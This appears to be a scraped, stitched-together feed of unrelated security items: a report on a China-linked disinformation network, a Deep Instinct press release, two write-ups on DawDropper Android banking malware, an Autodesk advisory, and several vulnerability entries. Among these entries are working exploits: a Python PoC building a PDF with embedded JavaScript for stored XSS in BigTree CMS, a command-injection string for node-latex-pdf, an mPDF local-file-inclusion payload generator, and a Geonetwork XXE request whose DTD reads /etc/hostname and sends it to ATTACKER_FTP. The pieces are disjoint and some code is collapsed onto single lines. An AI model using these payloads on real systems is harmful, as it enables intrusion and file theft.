A global network of inauthentic news sites present themselves as independent news outlets, offering content favoring China's government and articles critical of the US.

A fake-news influence campaign based in China is leveraging at least 72 inauthentic news sites to push content strategically aligned with the political interests of the People's Republic of China (PRC) across the globe and in multiple languages.  

The sites are linked to a Chinese public-relations firm called Shanghai Haixun Technology, according to a report from Mandiant, which dubbed the campaign "HaiEnergy." To disseminate the content, the effort makes use of various social-media accounts with hundreds of thousands of followers. 

The purpose of the campaign is to target global audiences with messaging intended to improve the international image of China — and to discredit critics of its policies. According to the new Mandiant report, the campaign narratives include promoting the reform of Hong Kong's electoral system — giving the mainland government more control over choosing candidates — and criticizing the United States and its allies.

At the start of the month, several of the sites published articles critical of US House Speaker Nancy Pelosi's recently concluded trip to Taiwan, warning her to "stay away from Taiwan."

The content also attempts to discredit outspoken government opponents, including German anthropologist Adrian Zenz, who is known for his research on China's autonomous Xinjiang territory in the northwest, where there has been a reported genocide against the Uyghur population.

This was done via website articles and social-media posts, featuring what Mandiant suspects to be "at least three fabricated letters, based on obvious grammatical errors and typos."

One letter was observed being used by a Twitter account belonging to a suspected inauthentic persona "Jonas Drosten" (@Jonas\_drosten), who posted a tweet containing images of three letters. The tweet, and one of the letters, alleges that Adrian received "financial support from US Senator Marco Rubio and former White House Chief Strategist Steve Bannon."  

The Uyghur ethnic minority community has in the past been a target of multiple other disinformation efforts.

**Outsourcing Fake News Efforts**

Mandiant researchers were not able to determine whether Shanghai Haixun Technology is aware of the fakeness of the HaiEnergy effort, but the researchers found evidence that the campaign has leveraged services and infrastructure belonging to the PR firm to host and distribute content.  

The campaign's use of third-party infrastructure allows the operators behind the campaign to obfuscate their identities while distributing content. And the use of a PR firm in this campaign may also be suggestive of recent trends noted by Meta (PDF) regarding the increased outsourcing of influence operations to third parties.

The Mandiant report also notes that actors that use PR firms may also do so to lower the barrier to entry for such activity to actors with limited experience in such areas.

"The campaign does not appear to be particularly sophisticated, as evidenced at least in part by the seeming lack of substantial engagement outside of inauthentic amplification of its content," says Ryan Serabian, senior analyst at Mandiant.  

For instance, some of the social-media accounts outright note that they've been commissioned to promote content, and their bios suggest that they were willing to do "paid promos."

Serabian explains that social-media platforms, governments, and other organizations increasingly look to root out inauthentic information activity, so he expects that actors will adapt new tactics and strategies, like contracting PR firms, to continue to achieve their aims.

"As we've highlighted, such actors might seek to leverage PR firms to distribute content, and they may also become more inventive in the types of content they distribute, such as by way of using technology like artificial intelligence-generated 'deepfake' images and videos," he says.  

This particular operation follows the efforts of Russian operatives, and those allied with Russian interests, which unleashed a deluge of disinformation and fake news to try and sow fear and confusion in Ukraine following the invasion of that nation.

Massive China-Linked Disinformation Campaign Taps PR Firm for Help

Agentless approach meets the attacker earlier to protect financial services and other large enterprises from an underserved attack vector.

**NEW YORK, NY – Aug. 3, 2022** – Deep Instinct, the first company to apply end-to-end deep learning to cybersecurity, today delivered Deep Instinct Prevention for Applications, an agentless, on-demand, antimalware solution for the enterprise that is device and operating system agnostic. This new offering revolutionizes threat protection beyond the endpoint with flexible, deploy anywhere, in-transit file scanning via API to quickly return a malicious versus benign verdict at enterprise speed. It protects any web application or cloud storage from malicious content while fully ensuring data privacy.

Until now, financial services and other industries with petabytes of data in motion each day have been at high risk from uploaded malicious content that can be detonated upon download from storage. These organizations have been relying on antiquated solutions that are slow, consume vast CPU and memory resources, and miss unknown malware, leaving this threat segment underserved.

In the wake of the pandemic, fintech transactions alone rose by 13% and their volume by 11%, indicating significant industry growth. With tens of millions of files in transit each day connected to high-value trading data, mortgage applications, insurance claims, and other sensitive information, financial institutions are at risk from unchecked malicious uploads or downloads and lack viable options to ensure infected content is not a threat to their operations or their customers. As threat actors seek alternative points of entry into enterprise environments, this risk factor will only increase. In fact, one study found that 35% of "never-before-seen" malware files were hidden in Microsoft Office and PDF files.

"As threat actors compromise points of entry beyond the endpoint, financial services institutions that exchange tens of millions of files each day are at increased risk. This was primarily created by the failure of established antivirus, network and other solutions to evolve. They are slow, can't scale or process high volumes of daily traffic or handle large file sizes, and often resort to sandboxing. As a result, they continue to miss unknown threats, and incur high infrastructure costs. "That's the worst of both worlds for an enterprise," said Guy Caspi, CEO and Co-Founder of Deep Instinct. "Deep Instinct is disrupting the cybersecurity status quo by setting a new standard for preventing malicious files, both known and unknown, before they reach storage."

Deep Instinct Prevention for Applications provides organizations an on-demand, high-speed scanning solution that prevents \>99% unknown malware hidden in files and easily scales to scan tens of millions of files per day. With very low CPU requirements, a low false-positive rate of <0.1%, near zero latency, and low processing requirements, Deep Instinct provides the most innovative solution for this underserved threat gap. A typical traditional AV solution is ineffective at preventing unknown malware, will require sandbox and cloud intelligence checks, and takes an average of 90 seconds to 3 minutes to make decisions. Traditional AV/sandbox solutions are ineffective at solving this issue as they are easily evaded and slow to respond. This increases risk and negatively affects the user experience but impacts the business by slowing down critical processes.

"Deep Instinct is addressing a major pain point of today's enterprise — their exposure to an ever-expanding number of attack vectors," said David OLeary, Field CISO – Sr. Director, Global Cybersecurity, SHI. "We look forward to bringing this truly unique solution to our enterprise customer base and helping them better protect themselves and their customers from malicious content as they exchange important files every day."

Other benefits of Deep Instinct Prevention for Applications include the following:

*   Does not rely on the cloud to provide a verdict.
*   Only the file hash ever leaves the environment, retaining full customer data privacy.
*   No customer data is used for training or updating AI models.
*   Minimal infrastructure resources, including CPU and memory usage, combined with a small footprint, ensure a low total cost of ownership.

For more product information and case studies, please visit: https://deepinstinct.com/prevention-for-applications.

**About Deep Instinct**

Deep Instinct takes a prevention-first approach to stopping ransomware and other malware using the world's first and only purpose-built, deep-learning cybersecurity framework. We predict and prevent known, unknown, and zero-day threats in <20 milliseconds, 750X faster than the fastest ransomware can encrypt. Deep Instinct has >99% zero-day accuracy and promises a <0.1% false positive rate. The Deep Instinct Prevention Platform is an essential addition to every security stack — providing complete, multilayered protection against threats across hybrid environments. For more, visit www.deepinstinct.com.

Deep Instinct Pioneers Deep-Learning Malware Prevention to Protect Mission-Critical Business Applications at Scale

BigTree CMS 4.4.16 was discovered to contain an arbitrary file upload vulnerability which allows attackers to execute arbitrary code via a crafted PDF file.

A stored cross-site scripting (XSS) vulnerability exists in BigTree-CMS 4.4.16 that allows an authenticated user authorized to upload a malicious .pdf file which acts as a stored XSS payload. If this stored XSS payload is triggered by an administrator it will trigger a XSS attack.

1.  Login as admin and access the files upload page:  
    
2.  Use the following PoC to generate malicious files:

import sys

from pdfrw import PdfWriter
from pdfrw.objects.pdfname import PdfName
from pdfrw.objects.pdfstring import PdfString
from pdfrw.objects.pdfdict import PdfDict
from pdfrw.objects.pdfarray import PdfArray

def make\_js\_action(js):
    action \= PdfDict()
    action.S \= PdfName.JavaScript
    action.JS \= js
    return action

def make\_field(name, x, y, width, height, r, g, b, value\=""):
    annot \= PdfDict()
    annot.Type \= PdfName.Annot
    annot.Subtype \= PdfName.Widget
    annot.FT \= PdfName.Tx
    annot.Ff \= 2
    annot.Rect \= PdfArray(\[x, y, x + width, y + height\])
    annot.MaxLen \= 160
    annot.T \= PdfString.encode(name)
    annot.V \= PdfString.encode(value)

    \# Default appearance stream: can be arbitrary PDF XObject or
    \# something. Very general.
    annot.AP \= PdfDict()

    ap \= annot.AP.N \= PdfDict()
    ap.Type \= PdfName.XObject
    ap.Subtype \= PdfName.Form
    ap.FormType \= 1
    ap.BBox \= PdfArray(\[0, 0, width, height\])
    ap.Matrix \= PdfArray(\[1.0, 0.0, 0.0, 1.0, 0.0, 0.0\])
    ap.stream \= """
%f %f %f rg
0.0 0.0 %f %f re f
""" % (r, g, b, width, height)

    \# It took me a while to figure this out. See PDF spec:
    \# https://www.adobe.com/content/dam/Adobe/en/devnet/acrobat/pdfs/pdf\_reference\_1-7.pdf#page=641

    \# Basically, the appearance stream we just specified doesn't
    \# follow the field rect if it gets changed in JS (at least not in
    \# Chrome).

    \# But this simple MK field here, with border/color
    \# characteristics, \_does\_ follow those movements and resizes, so
    \# we can get moving colored rectangles this way.
    annot.MK \= PdfDict()
    annot.MK.BG \= PdfArray(\[r, g, b\])

    return annot

def make\_page(fields, script):
    page \= PdfDict()
    page.Type \= PdfName.Page

    page.Resources \= PdfDict()
    page.Resources.Font \= PdfDict()
    page.Resources.Font.F1 \= PdfDict()
    page.Resources.Font.F1.Type \= PdfName.Font
    page.Resources.Font.F1.Subtype \= PdfName.Type1
    page.Resources.Font.F1.BaseFont \= PdfName.Helvetica

    page.MediaBox \= PdfArray(\[0, 0, 612, 792\])

    page.Contents \= PdfDict()
    page.Contents.stream \= """
BT
/F1 24 Tf
ET
    """

    annots \= fields

    page.AA \= PdfDict()
    \# You probably should just wrap each JS action with a try/catch,
    \# because Chrome does no error reporting or even logging otherwise;
    \# you just get a silent failure.
    page.AA.O \= make\_js\_action("""
try {
  %s
} catch (e) {
  app.alert(e.message);
}
    """ % (script))

    page.Annots \= PdfArray(annots)
    return page

if len(sys.argv) \> 1:
    js\_file \= open(sys.argv\[1\], 'r')

    fields \= \[\]
    for line in js\_file:
        if not line.startswith('/// '): break
        pieces \= line.split()
        params \= \[pieces\[1\]\] + \[float(token) for token in pieces\[2:\]\]
        fields.append(make\_field(\*params))

    js\_file.seek(0)

    out \= PdfWriter()
    out.addpage(make\_page(fields, js\_file.read()))
    out.write('result.pdf')

3.  Back to Files then we can see result.pdf have been upload:  
    
4.  When the administrator click the result.pdf it will trigger a XSS attack. In addition, after switching to a normal user, the normal user still have permission to access/site/index.php/admin/files/result.pdf and trigger a XSS attack.

CVE-2022-36197: A stored cross-site scripting (XSS) vulnerability exists in BigTree CMS 4.4.16 · Issue #392 · bigtreecms/BigTree-CMS

A command injection vulnerability affects all versions of the package node-latex-pdf.

**node-latex-pdf is susceptible to command injection**

Critical severity GitHub Reviewed Published Aug 3, 2022 • Updated Aug 10, 2022

GHSA-32fw-9wq8-9x9c: node-latex-pdf is susceptible to command injection

This affects all versions of package node-latex-pdf.

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

*   **snyk-id**
    
    SNYK-JS-NODELATEXPDF-1050426
    
*   **published**
    
    21 Jan 2021
    
*   **disclosed**
    
    11 Dec 2020
    
*   **credit**
    
    JHU System Security Lab
    

**How to fix?**

There is no fixed version for node-latex-pdf.

**Overview**

node-latex-pdf is a package that converts your latex files to pdf format.

Affected versions of this package are vulnerable to Command Injection.

**PoC**

    var a =require("node-latex-pdf");
    a("./","& touch JHU",function(){})

CVE-2020-28433: Snyk Vulnerability Database | Snyk

By Waqas
According to Trend Micro researchers, the DawDropper aims at stealing user data, in particular from banking apps on…
This is a post from HackRead.com Read the original post: New DawDropper Malware Targeting Android Devices via Play Store

****According to Trend Micro researchers, the DawDropper aims at stealing user data, in particular from banking apps on infected Android devices.****

Trend Micro security researchers have identified over a dozen malicious Android dropper apps containing **banking malware**. These apps are easily available on Google Play Store.

The scam is aimed at stealing users’ banking data to steal money from their banking apps. The stolen data includes PIN codes, banking credentials, passwords, etc. The malware can intercept text and gain complete control of the affected device.

> “We found a malicious campaign that uses a new dropper variant that we have dubbed as DawDropper. Under the guise of several Android apps such as Just In: Video Motion, Document Scanner Pro, Conquer Darkness, simpli Cleaner, and Unicc QR Scanner.”  
> 
> Trend Micro

Research revealed that DawDropper malware used a third-party cloud service Firebase Realtime Database to **evade detection** and obtain a payload download address. Additionally, it hosts payloads on GitHub.   

**What are Dropper Apps?**

According to researchers at Trend Micro, cybercriminals are now distributing banking trojans through dropper apps more than ever before because this technique helps them evade detection.

Dropper apps carry the malware without raising suspicion at the **Google Play Store** security mechanism. The apps are named so because of containing a payload comprising malware that these install on the infected handset. Furthermore, mobile malware is highly in demand nowadays as cybercriminals can disseminate their malware on the official Google play store.

**Malicious Apps Details  
**

The following are the names of the malicious dropper apps discovered on the Google Play Store:  

*   Fix Cleaner
*   Crypto Utils
*   Rooster VPN
*   Extra Cleaner
*   Lucky Cleaner
*   Simpli Cleaner
*   Unicc QR Scanner
*   Conquer Darkness
*   Call Recorder APK
*   Eagle photo editor
*   Call recorder pro+
*   Universal Saver Pro
*   Just In: Video Motion
*   Super Cleaner- hyper & smart
*   Document Scanner – PDF Creator

  
According to Trend Micro’s **blog post**, the DawDropper malware’s malicious payload has been linked to the Octo malware family. It is a multi-stage, modular malware. Octo is also called Coper and was previously used for targeting Colombian online banking customers. The malicious apps aren’t available on Google Play Store anymore.

**Google To Implement New Policy Changes  
**

As per the **Google support page**, the company is implementing policy changes to the Play Store. One of the changes will come into effect from September 30th, 2022.

These changes will prevent developers from displaying full-page ads in mobile games downloaded via the Play Store, or else these will have to be closed in 15 seconds unless it is an opt-in ad to unlock rewards. Moreover, the company will ban apps with copied icons, designs, logos, or titles and **various VPN apps** from August 31.

**More Android Malware News**

1.  **300,000 Android users impacted by malware apps on Play Store**
2.  **New Android malware poses as “System Update” to steal your data**
3.  **38% of Android VPN Apps on Google Play Store Plagued with Malware**
4.  **Experts concerned over emergence of new Android banking trojan S.O.V.A.**
5.  **New Android malware on Play Store disables Play Protect to evade detection**

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

New DawDropper Malware Targeting Android Devices via Play Store

mPDF version 7.0 suffers from a local file inclusion vulnerability.

    # Exploit Title: mPDF 7.0 - Local File Inclusion# Google Dork: N/A# Date: 2022-07-23# Exploit Author: Musyoka Ian# Vendor Homepage: https://mpdf.github.io/# Software Link: https://mpdf.github.io/# Version: CuteNews# Tested on: Ubuntu 20.04, mPDF 7.0.x# CVE: N/A#!/usr/bin/env python3from urllib.parse import quotefrom cmd import Cmdfrom base64 import b64encodeclass Terminal(Cmd):    prompt = "\nFile >> "    def default(self, args):        payload_gen(args)def banner():    banner = """                          _____  _____  ______   ______ ___  __   __                  _       _ _                            |  __ \|  __ \|  ____| |____  / _ \ \ \ / /                 | |     (_) |                 _ __ ___  | |__) | |  | | |__        / / | | | \ V /    _____  ___ __ | | ___  _| |_                | '_ ` _ \|  ___/| |  | |  __|      / /| | | |  > <    / _ \ \/ / '_ \| |/ _ \| | __|               | | | | | | |    | |__| | |        / / | |_| | / . \  |  __/>  <| |_) | | (_) | | |_                |_| |_| |_|_|    |_____/|_|       /_/ (_)___(_)_/ \_\  \___/_/\_\ .__/|_|\___/|_|\__|                                                                               | |                                                                                                 |_|   """    print(banner)def payload_gen(fname):    payload = f'<annotation file="{fname}" content="{fname}" icon="Graph" title="Attached File: {fname}" pos-x="195" />'    encoded_payload = quote(payload)    print("[+] Replace the content with the payload below")    print(f"Url encoded payload:\n{encoded_payload}\n")    base64enc = b64encode(encoded_payload.encode())    print(f"Base64 encoded payload:\n{base64enc.decode()}\n")if __name__ == ("__main__"):    banner()    print("Enter Filename eg. /etc/passwd")    terminal= Terminal()    terminal.cmdloop()

mPDF 7.0 Local File Inclusion

A Double Free vulnerability allows remote attackers to execute arbitrary code through DesignReview.exe application on PDF files within affected installations. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

_Disclaimer_

_INFORMATION IN THIS DOCUMENT IS PROVIDED “AS IS” IN CONNECTION WITH AUTODESK® PRODUCTS. AUTODESK AND/OR ITS RESPECTIVE SUBSIDIARIES, AFFILIATES, SUPPLIERS AND LICENSORS AND ITS AND THEIR DIRECTORS, OFFICERS, EMPLOYEES, AGENTS AND REPRESENTATIVES MAKE NO REPRESENTATIONS ABOUT THE SITE, ANY PRODUCTS AND SERVICES CONTAINED ON THE SITE OR THE SUITABILITY OF THE INFORMATION CONTAINED IN THE MATERIALS, INFORMATION, CONTENT, DOCUMENTS, AND RELATED GRAPHICS PUBLISHED ON THIS SITE FOR ANY PURPOSE. THE SITE, ANY PRODUCTS OR SERVICES (INCLUDING WITHOUT LIMITATION, THIRD PARTY PRODUCTS AND SERVICES) OBTAINED THROUGH THE SITE, AND ALL SUCH INFORMATION, CONTENT, DOCUMENTS, AND RELATED GRAPHICS ARE PROVIDED FOR YOUR USE AT YOUR OWN RISK AND "AS IS" WITHOUT WARRANTY OF ANY KIND. AUTODESK AND/OR ITS RESPECTIVE SUBSIDIARIES, AFFILIATES, SUPPLIERS AND LICENSORS HEREBY DISCLAIM ALL WARRANTIES AND CONDITIONS WITH REGARD TO THIS SITE, SUCH PRODUCTS AND SERVICES AND SUCH INFORMATION, CONTENT, DOCUMENTS, AND RELATED GRAPHICS, INCLUDING ALL IMPLIED WARRANTIES AND CONDITIONS OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, TITLE, AND NON-INFRINGEMENT._

_© 2022, Autodesk, Inc._

CVE-2022-27864: Security Advisories | Autodesk Trust Center

Geonetwork versions 3.1.x through 4.2.0 suffer from an XML external entity injection vulnerability.

    # Exploit Title: Geonetwork 4.2.0 - XML External Entity (XXE)# Date: 2022-July-11# Exploit Author: Amel BOUZIANE-LEBLOND (https://twitter.com/amellb)# Vendor Homepage: https://geonetwork-opensource.org/# Version: Geonetwork 3.10.X through 4.2.0# Tested on: Microsoft Windows Server & Linux# Description:# GeoNetwork 3.1.x through 4.2.0# During rendering pdf of map.# The XML parser is now configured securely to validate submitted XML document accepted from an untrusted source, which might result in arbitrary files retrieval from the server.====================PDF RENDERING==================== POST /geonetwork/pdf/create.json HTTP/1.1Host: REDACTEDContent-Type: application/jsonConnection: closeContent-Length: 563{"layout":"landscape","srs":"","units":"m","rotation":0,"lang":"fre","dpi":"190","outputFormat":"pdf","layers":[{"opacity":1,"type":"mapServer","baseURL":"http://attacker/xxe.xml","layers":["Tracts",],"format":"image/svg+xml","name":"xxe","extent":[-20037508.34,-20037508.34,20037508.34,20037508.34],"tileSize":[256,256]}],"enableLegends":true,"hasTitle":true,"hasNoTitle":false,"hasAttribution":false,"pages":[{"center":[172063.3620639667,4200083.030736061],"scale":"2.5E7","dataOwner":"© ","rotation":0,"comment":"ok","title":"ok","langfre":true}]}The parameters baseURL will be your XML files : ====================XXE_ATTACK==================== ====================XXE.XML=======================<!DOCTYPE foo [ <!ENTITY % pe SYSTEM "http://ATTACKER/x.dtd"> %pe; %param1; ]><foo>&external;</foo>====================X.dtd=========================They will call the x.dtd<!ENTITY % stuff SYSTEM "file:///etc/hostname"><!ENTITY % param1 "<!ENTITY external SYSTEM 'ftp://ATTACKER_FTP/%stuff;'>">

Geonetwork 4.2.0 XML Injection

A malicious campaign leveraged seemingly innocuous Android dropper apps on the Google Play Store to compromise users' devices with banking malware.
These 17 dropper apps, collectively dubbed DawDropper by Trend Micro, masqueraded as productivity and utility apps such as document scanners, QR code readers, VPN services, and call recorders, among others. All these apps in question have been

A malicious campaign leveraged seemingly innocuous Android dropper apps on the Google Play Store to compromise users' devices with banking malware.

These 17 dropper apps, collectively dubbed **DawDropper** by Trend Micro, masqueraded as productivity and utility apps such as document scanners, QR code readers, VPN services, and call recorders, among others. All these apps in question have been removed from the app marketplace.

"DawDropper uses Firebase Realtime Database, a third-party cloud service, to evade detection and dynamically obtain a payload download address," the researchers said. "It also hosts malicious payloads on GitHub."

Droppers are apps designed to sneak past Google's Play Store security checks, following which they are used to download more potent and intrusive malware on a device, in this case, Octo (Coper), Hydra, Ermac, and TeaBot.

Attack chains involved the DawDropper malware establishing connections with a Firebase Realtime Database to receive the GitHub URL necessary to download the malicious APK file.

The list of malicious apps previously available from the app store is below -

*   Call Recorder APK (com.caduta.aisevsk)
*   Rooster VPN (com.vpntool.androidweb)
*   Super Cleaner- hyper & smart (com.j2ca.callrecorder)
*   Document Scanner - PDF Creator (com.codeword.docscann)
*   Universal Saver Pro (com.virtualapps.universalsaver)
*   Eagle photo editor (com.techmediapro.photoediting)
*   Call recorder pro+ (com.chestudio.callrecorder)
*   Extra Cleaner (com.casualplay.leadbro)
*   Crypto Utils (com.utilsmycrypto.mainer)
*   FixCleaner (com.cleaner.fixgate)
*   Just In: Video Motion (com.olivia.openpuremind)
*   com.myunique.sequencestore
*   com.flowmysequto.yamer
*   com.qaz.universalsaver
*   Lucky Cleaner (com.luckyg.cleaner)
*   Simpli Cleaner (com.scando.qukscanner)
*   Unicc QR Scanner (com.qrdscannerratedx)

Included among the droppers is an app named "Unicc QR Scanner" that was previously flagged by Zscaler earlier this month as distributing the Coper banking trojan, a variant of the Exobot mobile malware.

Octo is also known to disable Google Play Protect and use virtual network computing (VNC) to record a victim device's screen, including sensitive information such as banking credentials, email addresses and passwords, and PINs, all of which are subsequently exfiltrated to a remote server.

Banking droppers, for their part, have evolved since the start of the year, pivoting away from hard-coded payload download addresses to using an intermediary to conceal the address hosting the malware.

"Cybercriminals are constantly finding ways to evade detection and infect as many devices as possible," the researchers said.

"Additionally, because there is a high demand for novel ways to distribute mobile malware, several malicious actors claim that their droppers could help other cybercriminals disseminate their malware on Google Play Store, resulting in a dropper-as-a-service (DaaS) model."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#pdf